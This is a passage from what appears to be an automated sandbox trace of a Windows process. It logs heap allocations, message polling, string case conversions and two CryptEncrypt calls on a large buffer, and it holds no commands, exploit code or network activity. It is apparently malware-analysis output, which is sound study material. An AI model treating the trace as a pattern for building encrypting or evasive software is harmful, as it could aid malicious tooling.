hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0215.868] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0215.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ae8 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0215.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0215.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0215.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0215.869] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0215.869] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.869] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0215.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab980 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74868 [0215.869] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0215.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.870] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.870] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0215.870] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.870] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74868 | out: hHeap=0x2af0000) returned 1 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.871] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0215.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.871] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.871] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.871] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.871] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0215.872] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0215.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0215.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0215.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabce0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.875] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x8ed4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8ed8) returned 1 [0215.875] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.876] CharLowerBuffW (in: lpsz="byte[36568]", cchLength=0xb | out: lpsz="byte[36568]") returned 0xb [0215.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.876] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.877] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.877] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.877] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.877] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.877] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2aae878*, pdwDataLen=0x8cef60*=0x8ed4, dwBufLen=0x8ed8 | out: pbData=0x2aae878*, pdwDataLen=0x8cef60*=0x8ed8) returned 1 [0215.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.879] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.879] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.879] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.879] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.879] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.879] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.879] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.879] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.879] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 